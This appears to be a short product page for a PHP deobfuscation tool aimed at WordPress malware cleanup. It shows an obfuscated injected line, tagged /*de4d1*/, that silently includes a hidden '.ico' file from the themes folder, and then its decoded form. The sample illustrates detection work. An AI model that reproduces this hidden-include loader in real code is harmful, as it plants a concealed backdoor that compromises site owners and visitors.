Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php /*de4d1*/ @include "\057v\141r\057w\167w\057h\164m\154/\167p\057w\160-\143o\156t\145n\164/\164h\145m\145s\057.\0633\1465\065c\146c\056i\143o"; /*de4d1*/...



Obfuscated php code

<?php
/*de4d1*/

@include "\057v\141r\057w\167w\057h\164m\154/\167p\057w\160-\143o\156t\145n\164/\164h\145m\145s\057.\0633\1465\065c\146c\056i\143o";

/*de4d1*/

Decoded(de-Obfuscated) php code

<?php

/*de4d1*/
@(include "/var/www/html/wp/wp-content/themes/.33f55cfc.ico");
/*de4d1*/


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.